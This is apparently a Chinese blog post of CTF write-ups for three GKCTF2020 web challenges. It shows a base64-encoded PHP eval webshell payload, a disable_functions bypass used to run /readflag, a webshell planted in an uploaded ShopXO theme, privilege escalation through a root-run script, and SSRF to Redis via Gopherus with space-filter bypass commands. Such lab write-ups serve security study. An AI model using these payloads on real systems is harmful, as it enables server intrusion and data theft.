buu-web刷题

最新推荐文章于 2022-09-29 22:35:28 发布
最新推荐文章于 2022-09-29 22:35:28 发布
阅读量206 收藏
点赞数 2
分类专栏: web 文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46540840/article/details/121176084
版权

GKCTF2020复现

备赛刷题

CheckIN

首先源码

<title>Check_In</title>
<?php 
highlight_file(__FILE__);
class ClassName
{
        public $code = null;
        public $decode = null;
        function __construct()
        {
                $this->code = @$this->x()['Ginkgo'];
                $this->decode = @base64_decode( $this->code );
                @Eval($this->decode);
        }

        public function x()
        {
                return $_REQUEST;
        }
}
new ClassName();

乍一看没有反序列unsearialize函数 但是这里直接就可以命令执行了phpinfo()一下

直接可以命令执行

在这里插入图片描述

尝试直接命令执行无果. 经发现是禁了许多函数

在这里插入图片描述

第一时间想到的就是可以利用蚁剑连马

传入eval($_POST['rgylin']);  并且进行base编码 =>ZXZhbCgkX1BPU1RbJ3JneWxpbiddKTs=
post 传 rgylin =phpinfo();
可以命令执行
连接
但是flag 打开是一片空白

但发现执行不了

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-LqyNEiql-1636167944696)(C:\Users\ASUS\Desktop\web刷题\图片\QQ截图20211106000523.png)]

利用 bypass 文件上传并包含 (这里是用php7-gc-bypass)在tmp目录中上传 改成pwn("/readflag"); 执行

再去包含此文件即可

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-QK99pEin-1636167944697)(C:\Users\ASUS\Desktop\web刷题\图片\QQ截图20211106001024.png)]

include('/tmp/exploit.php');=>base64=>aW5jbHVkZSgnL3RtcC9leHBsb2l0LnBocCcpOw==

拿到flag

签到都这末费劲0.0

老八小超市儿

打开容器是一套商场CMS

发现有后台
在这里插入图片描述

登入成功

发现有上传主题点,去官网随便下载一个主题并将马写上上传

发现成功执行
在这里插入图片描述

a=system(‘cat /flag’);时候得到了一个假flag

蚁剑链接

发现有flag.hint

Sat Nov  6 01:20:14 2021
Get The RooT,The Date Is Useful!

查看一下权限发现auto.sh有root权限

其内容是

#!/bin/sh
while true; do (python /var/mail/makeflaghint.py &) && sleep 60; done

那末我们可以通过这个脚本来读取flag

将gk改为

gk=open("/root/flag",'r').read();

便可拿到flag

EZ三剑客-EzWeb

首先打开网页来看 就是一个ssrf

发现file被过滤了 无法读取文件

查看源码发现

<!--?secret-->

传1 得到ip地址

那就扫一下该网段存活的主机,发现6 存在 那再扫一下端口

在这里插入图片描述

发现6379开放,是ssrf 无疑了

然后就没思路了 之前没怎么做过这方面题参考大佬wp

利用gopherus GitHub一搜就有

生成payload

在这里插入图片描述

直接打过去 然后访问 得到flag 但这里必须得绕过空格才行 原理不知道为啥

有$IFS < 等等

10.0.102.6//shell.php?rgylin=system('cat$IFS$9/flag');
10.0.102.6//shell.php?rgylin=system('cat</flag');

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-AvO4hG4M-1636167944702)(C:\Users\ASUS\Desktop\web刷题\图片\QQ截图20211106110345.png)]

拿到flag

Rgylin
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[GKCTF2020]老八小超市儿 -wp
freerats的博客
06-07 1233
这道题本就是基于shopxo已有的漏洞,解题思路也就基于此漏洞,若一开始对此漏洞无了解,那就比较难顶了 打开题目,就是一购物主页。 如果有了解shopxo,就知道默认后台就是admin.php, 登入的默认账号密码是admin和shopxo。 然后就进入到了网站后台 接下来就在应用中心里的应用商店找到主题,然后下载默认主题 因为后面应用主题的时候需要我们重新把下载的这个压缩包传上去,那我们就可以把一句话写入压缩包,给他一起传上去。 我们可以在_static_里面加上一个test.php,这里面就是我们加入
【学习笔记 21】 buu [GKCTF2020]老八小超市儿
weixin_43553654的博客
06-24 539
0x00 知识点 web安全渗透,后渗透提权 ps:想要看我之前的文章请点击如下链接 点我点我 00x1 解题思路 一看题目就是一道有味道的ctf题,打开一看发现是个(粉粉嫩的)网站shopxocms的网站,百度搜索对应的网站漏洞,说是后台有地方可以利用压缩包getshell,尝试一下发现是admin.php就能打开对应的后台登录界面,并且知道了初始登录用户名admin,密码shopox,直接登录后台 登陆进去后在应用中心->应用商店->主题的第一个默认主题,下载下来 用其中任意一个压缩包,用
BUU Web[21-24]
qq_41513009的博客
09-28 466
BUU Web[21-24]
BUU Web[29-32]
qq_41513009的博客
09-29 691
BUU Web[29-32]
[GKCTF2020]老八小超市儿
feng的博客
11-27 265
知识点 shopxo后台全版本获取shell 搜索能力 WP 这题又没做出来,很迷,只要问题在于自己知道应该是考察shopxo的漏洞,但是发现怎么查都查不到,但是大师傅们总能是可以查到各种他们需要的东西,还是自己搜索的能力太弱了,这方面的能力也需要加强啊,毕竟做题都是面向谷歌搜索(笑)。 这题的获取shell可以参考这篇文章: 渗透测试|shopxo后台全版本获取shell复现 已经讲的很详细了,一直到把文件传上去都是很详细的。 但是传上去的文件到底在哪是一个很大的问题。 通过在主页f12看源码,可以看
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
在本题目中,我们面临的是一个关于WebAssembly(简称WASM)逆向分析的挑战,源自FlareOn5赛事的Web2.0关卡。WebAssembly是一种低级虚拟机指令集,它允许开发者以接近原生的速度运行用C、C++或Rust等语言编译的代码。...
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
最新发布
05-26
在"BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)"这个挑战中,参赛者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
POSN:POSN-BUU的源代码
04-01
POSN-BUU可能是该系统的一个特定实现或者模块,主要用于处理BUU(Base Unit Unit,基本单元)相关的定位任务。这个源代码是用C++编程语言编写的,C++是一种通用且高效的编程语言,特别适合开发对性能要求高的系统...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md
08-10
一些关于xss的payload
GKCTF2020_web
ChenZIDu的博客
05-25 726
不完整,先把打出来的题目写一下,再写复现的好了 CheckIN 源码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->cod
BUUCTF刷题Web解题方法总结(一)
Y1seco的博客
03-28 5162
文章目录1.堆叠注入,原理2.SQL缺省代码审计SQL注入 1.堆叠注入,原理 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FRO
2020/7/21 - [GKCTF2020]老八小超市 - 弱密码、木马上传、间接非正常提权
抒情诗
07-21 311
这是个简单的实体环境了,这个弱密码起到了很大的作用 文章目录1.弱密码2.下载主题3.上传木马4.连接木马 1.弱密码 shopxo管理员好像有两个,一个是admin(超级管理员),另一个是shopxo(一般管理员),他们的密码都是shopxo,一句话,弱密码真恶心。 2.下载主题 下载第一个默认主题,不要钱的直接下。 3.上传木马 搞个一句话 安装主题,当主题转为1.8.1就安装成功了,我们的一句话也就上传成功了。 4.连接木马 由此推测我们的一句话上传到的位置为 http://d6f0faff-
GKCTF web-老八小超市儿 解题思路writeup
qq_41743240的博客
05-24 1163
打开题目 一看就知道是个CMS,我们试着搜索一下ShopXO企业级免费开源商城系统的漏洞,可以知道一个后台的文件上传漏洞 利用方法链接 http://www.nctry.com/1660.html 之后查看flag,会发现是假的,但从中可以知道真实flag在root目录下,访问root目录没有权限 查看根目录的flag.hint可以知道一个线索: Sun May 24 07:51:26 2020 Get The RooT,The Date Is Useful! 然后查看根目录的auto.sh可
GKCTF2020web
conelly的博客
03-26 313
[GKCTF2020]cve版签到 PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的‘get_headers()’函数存在安全漏洞。如果URL包含零(\ 0)字符,则 URL将被静默地截断。 这可能会导致某些软件对get_headers()的目标做出错误的假设,并可能将某些信息发送到错误的服务器。 先访问本地主机,用%00截断 /?url=http://127.0.0.1%00www.ctfhub.com 提示要以123结尾 /?url=h
GKCTF2020--部分复现(加密和web
SopRomeo的博客
05-26 822
GKCTF2020–web CheckIN title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()
2021-02-24
m0_53314778的博客
02-24 472
[GKCTF2020]老八小超市儿 知识点 shopxo后台全版本获取shell 搜索能力 渗透测试|shopxo后台全版本获取shell复现 启动靶机: 一看就知道是个CMS,我们试着搜索一下ShopXO企业级免费开源商城系统的漏洞,可以知道一个后台的文件上传漏洞 知道了默认后台地址以及账号和密码:/admin.php | admin:shopxo 成功进入后台 左侧找到安装主题功能,然后到shopxo官网下载一个官方的主题模板,摸了一下主题模板的结构后发现可以把马插在压缩包的/主题名/_stati
BUUCTFweb刷题记录
夜幕下的灯火阑珊的博客
04-03 2856
[极客大挑战 2019]BabySQL 本题过滤了or from by where ,用双写绕过即可
buu ctf web进阶]ssti
08-23
buu ctf web进阶中,ssti代表 Side Template Injection,是一种应用程序中的安全漏洞。通过此漏洞,攻击者可以注入恶意代码到服务器端的模板引擎,从而执行任意代码或获取敏感信息。这种漏洞可能导致服务器被入侵...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值